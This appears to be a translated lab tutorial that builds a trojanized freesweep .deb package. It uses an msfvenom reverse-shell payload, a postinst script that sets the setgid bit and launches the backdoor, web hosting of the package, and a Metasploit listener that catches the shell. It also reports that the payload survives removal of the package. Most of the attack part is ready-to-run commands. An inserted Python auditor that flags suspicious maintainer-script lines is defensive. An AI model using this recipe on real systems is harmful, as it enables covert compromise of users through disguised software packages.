Using MSF msfvenom to build a malicious deb package that triggers a backdoor
Lab environment
- Kali Linux 2019.1a
- Kali Linux 2020.4
1. Building the malicious package
To build the malicious package, download the package with --download-only so that it is fetched but not installed.
Note: the package used here is freesweep
root@fengzilin53:~# apt --download-only install -y freesweep
root@fengzilin53:~# mv /var/cache/apt/archives/freesweep_1.0.1-2_amd64.deb /root //move freesweep to /root
root@fengzilin53:~# dpkg -x freesweep_1.0.1-2_amd64.deb free //unpack into the free directory
root@fengzilin53:~# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.37.138 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources
Note: when generating the package, both the payload and the package metadata must be chosen so that they can run on the target operating system. Create the package metadata directory:
root@fengzilin53:~# mkdir free/DEBIAN && cd free/DEBIAN
root@fengzilin53:~/free/DEBIAN# tee /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
EOF
Create the deb package's post-install script, which loads the backdoor:
root@fengzilin53:~# tee /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF
sudo /usr/games/freesweep_sources &
is the malicious code we want to execute; the & runs the command in the background.
Give the script execute permission and build the new deb package:
root@fengzilin53:~# cd
root@fengzilin53:~# chmod 755 /root/free/DEBIAN/postinst
root@fengzilin53:~# dpkg-deb --build /root/free/
root@fengzilin53:~# ls free.deb
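Seen from the receiving side, a package like the one just built is easy to inspect before it is ever installed. The following is an added example, not code from the original post: it parses the .deb's outer ar container and control.tar.* with only the Python standard library and flags maintainer-script lines such as the two in the postinst above (a setuid/setgid chmod and a backgrounded command). PATTERNS, SCRIPTS and build_sample_deb are this example's own names; the sample package is constructed in memory.

```python
import io
import re
import tarfile

# Maintainer-script lines that merit a closer look (this example's own list).
PATTERNS = [
    (r"chmod\s+[0-7]?[2467][0-7]{3}\b|chmod\s+\S*[+=]\S*s\b", "sets setuid/setgid bit"),
    (r"&\s*$", "leaves a background process running"),
    (r"\b(curl|wget)\b|/dev/tcp/", "opens a network connection"),
]
SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

def parse_ar(blob):
    """Return {member_name: bytes} for a classic ar archive (the outer .deb container)."""
    assert blob[:8] == b"!<arch>\n", "not an ar archive"
    members, pos = {}, 8
    while pos + 60 <= len(blob):  # 60-byte fixed header, then the member data
        hdr = blob[pos:pos + 60]
        name, size = hdr[:16].decode().strip().rstrip("/"), int(hdr[48:58].decode())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)  # member data is padded to an even offset
    return members

def maintainer_scripts(deb_bytes):
    """Pull preinst/postinst/prerm/postrm out of control.tar.* without running dpkg."""
    ctrl = next(v for k, v in parse_ar(deb_bytes).items() if k.startswith("control.tar"))
    with tarfile.open(fileobj=io.BytesIO(ctrl), mode="r:*") as tar:
        return {m.name.lstrip("./"): tar.extractfile(m).read().decode()
                for m in tar.getmembers() if m.isfile() and m.name.lstrip("./") in SCRIPTS}

def audit_deb(deb_bytes):
    """Return [(script, line, reason)] for every suspicious maintainer-script line."""
    findings = []
    for script, text in maintainer_scripts(deb_bytes).items():
        for line in text.splitlines():
            findings += [(script, line.strip(), why) for pat, why in PATTERNS if re.search(pat, line)]
    return findings

def build_sample_deb(postinst):
    """Constructed test input: a minimal .deb holding only a control file and a postinst."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in (("./control", b"Package: sample\n"), ("./postinst", postinst.encode())):
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(data), 0o755
            tar.addfile(info, io.BytesIO(data))
    def member(name, data):  # one ar member: 60-byte header + data, padded to even length
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{100644:<8}{len(data):<10}`\n".encode()
        return hdr + data + (b"\n" if len(data) % 2 else b"")
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())
```

Running audit_deb over the real free.deb built above reports both postinst lines, while a package whose postinst only runs set -e / exit 0 reports nothing.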
Open a new terminal and start the MSF listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.37.138
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run
Copy the deb package to the web root:
root@fengzilin53:~# cp /root/free.deb /var/www/html/
On Kali Linux 2020.4, download the deb package:
└─# wget http://192.168.37.138/free.deb
Install the free.deb package:
└─# dpkg -i free.deb
Return to the Kali terminal and see that a shell has been obtained.
On Kali 2020.4, after uninstalling the package, the payload still runs normally:
dpkg -r freesweep
pwd